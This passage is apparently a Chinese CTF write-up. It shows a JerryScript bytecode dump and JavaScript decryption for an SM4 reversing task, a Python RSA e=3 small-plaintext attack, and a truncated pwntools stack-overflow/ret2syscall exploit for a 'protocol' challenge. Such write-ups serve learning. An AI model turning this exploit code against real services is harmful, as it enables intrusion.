374 : CBC_PUSH_NUMBER_POS_BYTE number:39
376 : CBC_PUSH_NUMBER_POS_BYTE number:82
378 : CBC_PUSH_NUMBER_POS_BYTE number:76
380 : CBC_PUSH_NUMBER_POS_BYTE number:54
382 : CBC_PUSH_NUMBER_POS_BYTE number:2
384 : CBC_PUSH_NUMBER_POS_BYTE number:231
386 : CBC_PUSH_NUMBER_POS_BYTE number:160
388 : CBC_PUSH_NUMBER_POS_BYTE number:196
390 : CBC_PUSH_NUMBER_POS_BYTE number:200
392 : CBC_PUSH_NUMBER_POS_BYTE number:158
394 : CBC_NEW byte_arg:16
396 : CBC_ASSIGN_BLOCK
397 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:8
400 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:234
403 : CBC_PUSH_NUMBER_POS_BYTE number:191
405 : CBC_PUSH_NUMBER_POS_BYTE number:138
407 : CBC_PUSH_NUMBER_POS_BYTE number:210
409 : CBC_PUSH_NUMBER_POS_BYTE number:64
411 : CBC_PUSH_NUMBER_POS_BYTE number:199
413 : CBC_PUSH_NUMBER_POS_BYTE number:56
415 : CBC_PUSH_NUMBER_POS_BYTE number:181
417 : CBC_PUSH_NUMBER_POS_BYTE number:163
419 : CBC_PUSH_NUMBER_POS_BYTE number:247
421 : CBC_PUSH_NUMBER_POS_BYTE number:242
423 : CBC_PUSH_NUMBER_POS_BYTE number:206
425 : CBC_PUSH_NUMBER_POS_BYTE number:249
427 : CBC_PUSH_NUMBER_POS_BYTE number:97
429 : CBC_PUSH_NUMBER_POS_BYTE number:21
431 : CBC_PUSH_NUMBER_POS_BYTE number:161
433 : CBC_NEW byte_arg:16
435 : CBC_ASSIGN_BLOCK
436 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:9
439 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:224
442 : CBC_PUSH_NUMBER_POS_BYTE number:174
444 : CBC_PUSH_NUMBER_POS_BYTE number:93
446 : CBC_PUSH_NUMBER_POS_BYTE number:164
448 : CBC_PUSH_NUMBER_POS_BYTE number:155
450 : CBC_PUSH_NUMBER_POS_BYTE number:52
452 : CBC_PUSH_NUMBER_POS_BYTE number:26
454 : CBC_PUSH_NUMBER_POS_BYTE number:85
456 : CBC_PUSH_NUMBER_POS_BYTE number:173
458 : CBC_PUSH_NUMBER_POS_BYTE number:147
460 : CBC_PUSH_NUMBER_POS_BYTE number:50
462 : CBC_PUSH_NUMBER_POS_BYTE number:48
464 : CBC_PUSH_NUMBER_POS_BYTE number:245
466 : CBC_PUSH_NUMBER_POS_BYTE number:140
468 : CBC_PUSH_NUMBER_POS_BYTE number:177
470 : CBC_PUSH_NUMBER_POS_BYTE number:227
472 : CBC_NEW byte_arg:16
474 : CBC_ASSIGN_BLOCK
475 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:10
478 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:29
481 : CBC_PUSH_NUMBER_POS_BYTE number:246
483 : CBC_PUSH_NUMBER_POS_BYTE number:226
485 : CBC_PUSH_NUMBER_POS_BYTE number:46
487 : CBC_PUSH_NUMBER_POS_BYTE number:130
489 : CBC_PUSH_NUMBER_POS_BYTE number:102
491 : CBC_PUSH_NUMBER_POS_BYTE number:202
493 : CBC_PUSH_NUMBER_POS_BYTE number:96
495 : CBC_PUSH_NUMBER_POS_BYTE number:192
497 : CBC_PUSH_NUMBER_POS_BYTE number:41
499 : CBC_PUSH_NUMBER_POS_BYTE number:35
501 : CBC_PUSH_NUMBER_POS_BYTE number:171
503 : CBC_PUSH_NUMBER_POS_BYTE number:13
505 : CBC_PUSH_NUMBER_POS_BYTE number:83
507 : CBC_PUSH_NUMBER_POS_BYTE number:78
509 : CBC_PUSH_NUMBER_POS_BYTE number:111
511 : CBC_NEW byte_arg:16
513 : CBC_ASSIGN_BLOCK
514 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:11
517 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:213
520 : CBC_PUSH_NUMBER_POS_BYTE number:219
522 : CBC_PUSH_NUMBER_POS_BYTE number:55
524 : CBC_PUSH_NUMBER_POS_BYTE number:69
526 : CBC_PUSH_NUMBER_POS_BYTE number:222
528 : CBC_PUSH_NUMBER_POS_BYTE number:253
530 : CBC_PUSH_NUMBER_POS_BYTE number:142
532 : CBC_PUSH_NUMBER_POS_BYTE number:47
534 : CBC_PUSH_NUMBER_POS_BYTE number:3
536 : CBC_PUSH_NUMBER_POS_BYTE number:255
538 : CBC_PUSH_NUMBER_POS_BYTE number:106
540 : CBC_PUSH_NUMBER_POS_BYTE number:114
542 : CBC_PUSH_NUMBER_POS_BYTE number:109
544 : CBC_PUSH_NUMBER_POS_BYTE number:108
546 : CBC_PUSH_NUMBER_POS_BYTE number:91
548 : CBC_PUSH_NUMBER_POS_BYTE number:81
550 : CBC_NEW byte_arg:16
552 : CBC_ASSIGN_BLOCK
553 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:12
556 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:141
559 : CBC_PUSH_NUMBER_POS_BYTE number:27
561 : CBC_PUSH_NUMBER_POS_BYTE number:175
563 : CBC_PUSH_NUMBER_POS_BYTE number:146
565 : CBC_PUSH_NUMBER_POS_BYTE number:187
567 : CBC_PUSH_NUMBER_POS_BYTE number:221
569 : CBC_PUSH_NUMBER_POS_BYTE number:188
571 : CBC_PUSH_NUMBER_POS_BYTE number:127
573 : CBC_PUSH_NUMBER_POS_BYTE number:17
575 : CBC_PUSH_NUMBER_POS_BYTE number:217
577 : CBC_PUSH_NUMBER_POS_BYTE number:92
579 : CBC_PUSH_NUMBER_POS_BYTE number:65
581 : CBC_PUSH_NUMBER_POS_BYTE number:31
583 : CBC_PUSH_NUMBER_POS_BYTE number:16
585 : CBC_PUSH_NUMBER_POS_BYTE number:90
587 : CBC_PUSH_NUMBER_POS_BYTE number:216
589 : CBC_NEW byte_arg:16
591 : CBC_ASSIGN_BLOCK
592 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:13
595 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:10
598 : CBC_PUSH_NUMBER_POS_BYTE number:193
600 : CBC_PUSH_NUMBER_POS_BYTE number:49
602 : CBC_PUSH_NUMBER_POS_BYTE number:136
604 : CBC_PUSH_NUMBER_POS_BYTE number:165
606 : CBC_PUSH_NUMBER_POS_BYTE number:205
608 : CBC_PUSH_NUMBER_POS_BYTE number:123
610 : CBC_PUSH_NUMBER_POS_BYTE number:189
612 : CBC_PUSH_NUMBER_POS_BYTE number:45
614 : CBC_PUSH_NUMBER_POS_BYTE number:116
616 : CBC_PUSH_NUMBER_POS_BYTE number:208
618 : CBC_PUSH_NUMBER_POS_BYTE number:18
620 : CBC_PUSH_NUMBER_POS_BYTE number:184
622 : CBC_PUSH_NUMBER_POS_BYTE number:229
624 : CBC_PUSH_NUMBER_POS_BYTE number:180
626 : CBC_PUSH_NUMBER_POS_BYTE number:176
628 : CBC_NEW byte_arg:16
630 : CBC_ASSIGN_BLOCK
631 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:14
634 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:137
637 : CBC_PUSH_NUMBER_POS_BYTE number:105
639 : CBC_PUSH_NUMBER_POS_BYTE number:151
641 : CBC_PUSH_NUMBER_POS_BYTE number:74
643 : CBC_PUSH_NUMBER_POS_BYTE number:12
645 : CBC_PUSH_NUMBER_POS_BYTE number:150
647 : CBC_PUSH_NUMBER_POS_BYTE number:119
649 : CBC_PUSH_NUMBER_POS_BYTE number:126
651 : CBC_PUSH_NUMBER_POS_BYTE number:101
653 : CBC_PUSH_NUMBER_POS_BYTE number:185
655 : CBC_PUSH_NUMBER_POS_BYTE number:241
657 : CBC_PUSH_NUMBER_POS_BYTE number:9
659 : CBC_PUSH_NUMBER_POS_BYTE number:197
661 : CBC_PUSH_NUMBER_POS_BYTE number:110
663 : CBC_PUSH_NUMBER_POS_BYTE number:198
665 : CBC_PUSH_NUMBER_POS_BYTE number:132
667 : CBC_NEW byte_arg:16
669 : CBC_ASSIGN_BLOCK
670 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:15
673 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:24
676 : CBC_PUSH_NUMBER_POS_BYTE number:240
678 : CBC_PUSH_NUMBER_POS_BYTE number:125
680 : CBC_PUSH_NUMBER_POS_BYTE number:236
682 : CBC_PUSH_NUMBER_POS_BYTE number:58
684 : CBC_PUSH_NUMBER_POS_BYTE number:220
686 : CBC_PUSH_NUMBER_POS_BYTE number:77
688 : CBC_PUSH_NUMBER_POS_BYTE number:32
690 : CBC_PUSH_NUMBER_POS_BYTE number:121
692 : CBC_PUSH_NUMBER_POS_BYTE number:238
694 : CBC_PUSH_NUMBER_POS_BYTE number:95
696 : CBC_PUSH_NUMBER_POS_BYTE number:62
698 : CBC_PUSH_NUMBER_POS_BYTE number:215
700 : CBC_PUSH_NUMBER_POS_BYTE number:203
702 : CBC_PUSH_NUMBER_POS_BYTE number:57
704 : CBC_PUSH_NUMBER_POS_BYTE number:72
706 : CBC_NEW byte_arg:16
708 : CBC_ASSIGN_BLOCK
709 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:30->number(462357) const:31->number(472066609)
713 : CBC_PUSH_THREE_LITERALS const:32->number(943670861) const:33->number(1415275113) const:34->number(1886879365)
717 : CBC_PUSH_THREE_LITERALS const:35->number(2358483617) const:36->number(2830087869) const:37->number(3301692121)
721 : CBC_PUSH_THREE_LITERALS const:38->number(3773296373) const:39->number(4228057617) const:40->number(404694573)
725 : CBC_PUSH_THREE_LITERALS const:41->number(876298825) const:42->number(1347903077) const:43->number(1819507329)
729 : CBC_PUSH_THREE_LITERALS const:44->number(2291111581) const:45->number(2762715833) const:46->number(3234320085)
733 : CBC_PUSH_THREE_LITERALS const:47->number(3705924337) const:48->number(4177462797) const:49->number(337322537)
737 : CBC_PUSH_THREE_LITERALS const:50->number(808926789) const:51->number(1280531041) const:52->number(1752135293)
741 : CBC_PUSH_THREE_LITERALS const:53->number(2223739545) const:54->number(2695343797) const:55->number(3166948049)
745 : CBC_PUSH_THREE_LITERALS const:56->number(3638552301) const:57->number(4110090761) const:58->number(269950501)
749 : CBC_PUSH_THREE_LITERALS const:59->number(741554753) const:60->number(1213159005) const:61->number(1684763257)
753 : CBC_NEW byte_arg:32
755 : CBC_ASSIGN_SET_IDENT ident:6->string(CK)
757 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:62->number(2746333894) const:63->number(1453994832)
761 : CBC_PUSH_TWO_LITERALS const:64->number(1736282519) const:65->number(2993693404)
764 : CBC_NEW byte_arg:4
766 : CBC_ASSIGN_SET_IDENT ident:7->string(FK)
768 : CBC_PUSH_LITERAL const:66->string(ctf{this_is_an_example})
770 : CBC_ASSIGN_SET_IDENT ident:18->string(input)
772 : CBC_PUSH_NUMBER_0
773 : CBC_ASSIGN_SET_IDENT ident:19->string(num)
775 : CBC_PUSH_LITERAL ident:23->string(Array)
777 : CBC_NEW0
778 : CBC_ASSIGN_SET_IDENT ident:20->string(message)
780 : CBC_PUSH_NUMBER_0
781 : CBC_MOV_IDENT reg:1
783 : CBC_JUMP_FORWARD offset:32(->815)
785 : CBC_MULTIPLY_TWO_LITERALS ident:19->string(num) const:67->number(256)
788 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:18->string(input) const:68->string(charCodeAt)
791 : CBC_PUSH_LITERAL reg:1
793 : CBC_CALL1_PROP_PUSH_RESULT
794 : CBC_ADD
795 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
797 : CBC_MODULO_TWO_LITERALS reg:1 const:69->number(4)
800 : CBC_EQUAL_RIGHT_LITERAL const:70->number(3)
802 : CBC_BRANCH_IF_FALSE_FORWARD offset:11(->813)
804 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
807 : CBC_PUSH_LITERAL ident:19->string(num)
809 : CBC_CALL1_PROP_BLOCK
810 : CBC_PUSH_NUMBER_0
811 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
813 : CBC_PRE_INCR_IDENT reg:1
815 : CBC_PUSH_TWO_LITERALS reg:1 ident:18->string(input)
818 : CBC_PUSH_PROP_LITERAL const:72->string(length)
820 : CBC_LESS
821 : CBC_BRANCH_IF_TRUE_BACKWARD offset:36(->785)
823 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:24->string(Math) const:73->string(ceil)
826 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
829 : CBC_DIVIDE_RIGHT_LITERAL const:69->number(4)
831 : CBC_CALL1_PROP_PUSH_RESULT
832 : CBC_ASSIGN_SET_IDENT ident:21->string(count)
834 : CBC_MULTIPLY_TWO_LITERALS ident:21->string(count) const:69->number(4)
837 : CBC_ASSIGN_SET_IDENT ident:22->string(pad_len)
839 : CBC_JUMP_FORWARD offset:7(->846)
841 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
844 : CBC_PUSH_NUMBER_0
845 : CBC_CALL1_PROP_BLOCK
846 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
849 : CBC_LESS_RIGHT_LITERAL ident:22->string(pad_len)
851 : CBC_BRANCH_IF_TRUE_BACKWARD offset:10(->841)
853 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:74->number(19088743) const:75->number(2309737967)
857 : CBC_PUSH_TWO_LITERALS const:76->number(4275878552) const:77->number(1985229328)
860 : CBC_NEW byte_arg:4
862 : CBC_ASSIGN_SET_IDENT_BLOCK ident:25->string(key)
864 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:78->number(1605062385) const:79->number(-642825121)
868 : CBC_PUSH_THREE_LITERALS const:80->number(2061445208) const:81->number(1405610911) const:82->number(1713399267)
872 : CBC_PUSH_THREE_LITERALS const:83->number(1396669315) const:84->number(1081797168) const:85->number(605181189)
876 : CBC_PUSH_THREE_LITERALS const:86->number(1824766525) const:87->number(1196148725) const:88->number(763423307)
880 : CBC_PUSH_LITERAL const:89->number(1125925868)
882 : CBC_NEW byte_arg:12
884 : CBC_ASSIGN_SET_IDENT_BLOCK ident:26->string(ans)
886 : CBC_PUSH_LITERAL ident:23->string(Array)
888 : CBC_NEW0
889 : CBC_ASSIGN_SET_IDENT_BLOCK ident:27->string(message_c)
891 : CBC_PUSH_NUMBER_0
892 : CBC_MOV_IDENT reg:1
894 : CBC_JUMP_FORWARD offset:47(->941)
896 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:90->string(splice)
899 : CBC_PUSH_NUMBER_0
900 : CBC_PUSH_NUMBER_POS_BYTE number:4
902 : CBC_CALL2_PROP_PUSH_RESULT
903 : CBC_MOV_IDENT reg:2
905 : CBC_PUSH_THREE_LITERALS ident:15->string(encrypt) reg:2 ident:25->string(key)
909 : CBC_CALL2_PUSH_RESULT
910 : CBC_MOV_IDENT reg:3
912 : CBC_PUSH_NUMBER_0
913 : CBC_MOV_IDENT reg:4
915 : CBC_JUMP_FORWARD offset:16(->931)
917 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:27->string(message_c) const:71->string(push)
920 : CBC_PUSH_THREE_LITERALS ident:28->string(parseInt) reg:3 reg:4
924 : CBC_PUSH_PROP
925 : CBC_PUSH_NUMBER_POS_BYTE number:16
927 : CBC_CALL2_PUSH_RESULT
928 : CBC_CALL1_PROP_BLOCK
929 : CBC_PRE_INCR_IDENT reg:4
931 : CBC_PUSH_TWO_LITERALS reg:4 reg:3
934 : CBC_PUSH_PROP_LITERAL const:72->string(length)
936 : CBC_LESS
937 : CBC_BRANCH_IF_TRUE_BACKWARD offset:20(->917)
939 : CBC_PRE_INCR_IDENT reg:1
941 : CBC_LESS_TWO_LITERALS reg:1 ident:21->string(count)
944 : CBC_BRANCH_IF_TRUE_BACKWARD offset:48(->896)
946 : CBC_PUSH_LITERAL ident:27->string(message_c)
948 : CBC_BRANCH_IF_FALSE_FORWARD offset:10(->958)
950 : CBC_PUSH_THREE_LITERALS ident:29->string(print) ident:17->string(compare_array) ident:27->string(message_c)
954 : CBC_PUSH_LITERAL ident:26->string(ans)
956 : CBC_CALL2_PUSH_RESULT
957 : CBC_CALL1_BLOCK
958 : CBC_RETURN_FUNCTION_END
false一开始用记事本打开snapshot的时候看到了sm4等关键词,猜测加密算法为sm4,符号没去找到了源码
/*! sm4-1.0.js (c) Windard Yang | <https://www.windard.com/>
*/
/*
* sm4-1.0.js
*
* Copyright (c) 2014 Windard Yang (www.windard.com)
*/
/**
* @fileOverview
* @name sm4-1.0.js
* @author Windard (www.windard.com)
* @version 1.0.0 (2016-11-17)
*/
/* this is sm4 in javascript by windard , today is 2016 11-17 ,
*I'm afraid that can I finished this project , but after all
*in December, everything will be done , that's prefect
*/
/*
* garbage , rubbish programe language, should havn't big decimal number
* can't circular bitwise left shift, can do xor well
*/
/*
* fuck it at all , finally finished it , and there has many other works need to do
*
*/
var SboxTable = new Array();
SboxTable[0] = new Array(0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05);
SboxTable[1] = new Array(0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99);
SboxTable[2] = new Array(0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62);
SboxTable[3] = new Array(0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6);
SboxTable[4] = new Array(0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8);
SboxTable[5] = new Array(0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35);
SboxTable[6] = new Array(0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87);
SboxTable[7] = new Array(0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e);
SboxTable[8] = new Array(0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1);
SboxTable[9] = new Array(0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3);
SboxTable[10] = new Array(0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f);
SboxTable[11] = new Array(0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51);
SboxTable[12] = new Array(0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8);
SboxTable[13] = new Array(0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0);
SboxTable[14] = new Array(0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84);
SboxTable[15] = new Array(0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48);
var CK = new Array(
0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
);
var FK = new Array(0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc);
// function bigxor(a, b) {
// if (a.toString(2).length < 33 && b.toString(2).length < 33){
// return a ^ b
// }
// var abin = a.toString(2);
// var bbin = b.toString(2);
// var loggest = abin.length >= bbin.length ? abin.length : bbin.length;
// abin = abin.length == loggest ? abin :"0".repeat(loggest - abin.length) + abin;
// bbin = bbin.length == loggest ? bbin :"0".repeat(loggest - bbin.length) + bbin;
// var result = "";
// for (var i = loggest - 1; i >= 0; i--) {
// result = abin[i] == bbin[i] ? '0'+result : '1'+result;
// };
// return parseInt(result, 2);
// }
function bigxor(a, b) {
return a ^ b
}
// function leftshift(a, n, size=32) {
// var result = new Array(size);
// result.fill(0);
// var bin = a.toString(2);
// bin = bin.length == size ? bin :"0".repeat(size - bin.length) + bin;
// for (var i = bin.length - 1; i >= 0; i--) {
// result[(i - n + size)%size] = bin[i];
// };
// result = result.join("");
// return parseInt(result, 2);
// }
function leftshift(a, n, size = 32) {
n = n % size
return (a << n) | (a >>> (size - n))
}
function prefixInteger(str, length) {
return Array(length + 1).join("0").split("").concat(String(str).split(""))
.slice(-length).join("");
}
// function sm4Sbox(a) {
// var a1 = prefixInteger(a.toString(16),8).slice(0,2);
// var a2 = prefixInteger(a.toString(16),8).slice(2,4);
// var a3 = prefixInteger(a.toString(16),8).slice(4,6);
// var a4 = prefixInteger(a.toString(16),8).slice(6,8);
// var b1 = SboxTable[parseInt(a1[0], 16)][parseInt(a1[1], 16)];
// var b2 = SboxTable[parseInt(a2[0], 16)][parseInt(a2[1], 16)];
// var b3 = SboxTable[parseInt(a3[0], 16)][parseInt(a3[1], 16)];
// var b4 = SboxTable[parseInt(a4[0], 16)][parseInt(a4[1], 16)];
// return parseInt(prefixInteger(b1.toString(16), 2) + prefixInteger(b2.toString(16), 2) + prefixInteger(b3.toString(16), 2) + prefixInteger(b4.toString(16), 2) , 16)
// }
function sm4Sbox(a) {
var b1 = SboxTable[(a & 0xf0000000) >>> 28][(a & 0x0f000000) >>> 24]
var b2 = SboxTable[(a & 0x00f00000) >>> 20][(a & 0x000f0000) >>> 16]
var b3 = SboxTable[(a & 0x0000f000) >>> 12][(a & 0x00000f00) >>> 8]
var b4 = SboxTable[(a & 0x000000f0) >>> 4][(a & 0x0000000f) >>> 0]
return (b1 << 24) | (b2 << 16) | (b3 << 8) | (b4 << 0)
}
function GET_ULONG_BE(a) {
a = sm4Sbox(a)
return bigxor(bigxor(bigxor(a, leftshift(a, 2)), bigxor(leftshift(a, 10), leftshift(a, 18))), leftshift(a, 24))
}
function PUT_ULONG_BE(b) {
b = sm4Sbox(b)
return bigxor(b, bigxor(leftshift(b, 13), leftshift(b, 23)));
}
function sm4_getkey(MK) {
var K = new Array();
var rk = new Array();
K[0] = bigxor(MK[0], FK[0]);
K[1] = bigxor(MK[1], FK[1]);
K[2] = bigxor(MK[2], FK[2]);
K[3] = bigxor(MK[3], FK[3]);
for (var i = 0; i < 32; i++) {
K[i + 4] = bigxor(K[i], PUT_ULONG_BE(bigxor(bigxor(K[i + 1], K[i + 2]), bigxor(K[i + 3], CK[i]))));
rk[i] = K[i + 4].toString(16);
}
;
return rk;
}
function KJUR_encrypt_sm4(messsage, key, method = "cbc") {
var MK = key;
var X = messsage;
var rk = sm4_getkey(MK);
for (var i = 0; i < 32; i++) {
X[i + 4] = bigxor(X[i], GET_ULONG_BE(bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)))))
}
;
var Y = new Array(X[35].toString(16), X[34].toString(16), X[33].toString(16), X[32].toString(16))
return Y;
}
function KJUR_decrypt_sm4(ciphertext, key, method = "cbc") {
var MK = key;
var X = ciphertext;
var frk = sm4_getkey(MK);
var rk = new Array()
for (var i = frk.length - 1; i >= 0; i--) {
rk[frk.length - 1 - i] = frk[i]
}
;
for (var i = 0; i < 32; i++) {
X[i + 4] = bigxor(X[i], GET_ULONG_BE(bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)))))
}
;
var Y = new Array(X[35].toString(16), X[34].toString(16), X[33].toString(16), X[32].toString(16))
return Y;
}
ciphertext = new Array(1605062385, -642825121, 2061445208, 1405610911);
ciphertext2 = new Array(1713399267, 1396669315, 1081797168, 605181189)
ciphertext3 = new Array(1824766525, 1196148725, 763423307, 1125925868)
key = new Array(19088743, 2309737967, 4275878552, 1985229328);
console.log(KJUR_decrypt_sm4(ciphertext, key))
console.log(KJUR_decrypt_sm4(ciphertext2, key))
console.log(KJUR_decrypt_sm4(ciphertext3, key))rocket
下了个断点,找到启动 rocket 的命令,发现是从当前 bin 中加载代码,找到对应位置搜索 “Input”,发现附近有一个很长的 hex 数据,又结合输出的内容都是 x ^ 3,猜测是 e = 3 的 rsa,使用如下脚本进行解密(e = 3 小明文攻击)
import gmpy2
import time
from Crypto.Util.number import long_to_bytes
n = 0xeb2bfe8de9bea9084b6c9ae8a80ed7d63d3f476d18749059cf5355de7e50a0e5caec565558f80c8b020343d13f4313adba67e9c7166a9e8c4f87ffbebd05c45f8249ac247cc33b6a728cecd50f3d4ae5d99a5eb1f4ddc1d180ea109e72310263e38d22b9967bd974be352eccc57dd758f2a8160204dd7a67357f7ec7e140186f825577f2ffe607bec21de9edfbcaaf227b711b14c7859455cc17e23642aac3f7f42f23e945ba5e7f6f1f008b24ed977f242f2fb9406848cb49c54af3f463c9609daa8ac3716c4d0d3fe6c1386298f481fcc20bed6ed078913fa04eeddd8033e7713efdae5f57603ab4305aefcfd205b2f315f392709d06bdfa23d6e89b9a617b
e = 3
res = 0
c = 7212272804013543391008421832457418223544765489764042171135982569211377620290274828526744558976950004052088838419495093523281490171119109149692343753662521483209758621522737222024221994157092624427343057143179489608942837157528031299236230089474932932551406181
for k in range(200000000):
if gmpy2.iroot(c + n * k, 3)[1] == 1:
res = gmpy2.iroot(c + n * k, 3)[0]
print(k, res)
print(long_to_bytes(res))
breakPWN
protocol
静态编译栈溢出 ret2syscall即可
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
import ctf_pb2
context.log_level = 'debug'
binary = 'protocol'
elf = ELF('protocol')
libc = elf.libc
context.binary = binary
if(len(sys.argv) == 3):
sh = remote(sys.argv[1],sys.argv[2])
else:
sh = process(binary)
l64 = lambda :u64(sh.recvuntil("\\x7f")[-6:].ljust(8,"\\x00"))
l32 = lambda :u32(sh.recvuntil("\\xf7")[-4:].ljust(4,"\\x00"))
sla = lambda a,b :sh.sendlineafter(str(a),str(b))
sa = lambda a,b :sh.sendafter(str(a),str(b))
lg = lambda name,data : sh.success(name + ": 0x%x" % data)
se = lambda payload: sh.send(payload)
rl = lambda : sh.recv()
sl = lambda payload: sh.sendline(payload)
ru = lambda a :sh.recvuntil(str(a))
def new_ctf(username = b"admin",password = b"admin"):
ctf = ctf_pb2.pwn()
ctf.username = username
ctf.password = password
payload = ctf.SerializeToString()
sh.sendafter(b"Login: ", payload)
def send_payload(offset,payload):
if (payload) == 0:
# new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x8,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x4,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x3,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x2,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x1,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a',b"c"*0x100)
elif payload < 0xff and payload > 0:
print("aaa")
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x7,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x6,b"c"*0x100)
new_ctf(b"a"*0x148 + offset*b'a' + b'a'*0x5,b"c"*0x100)
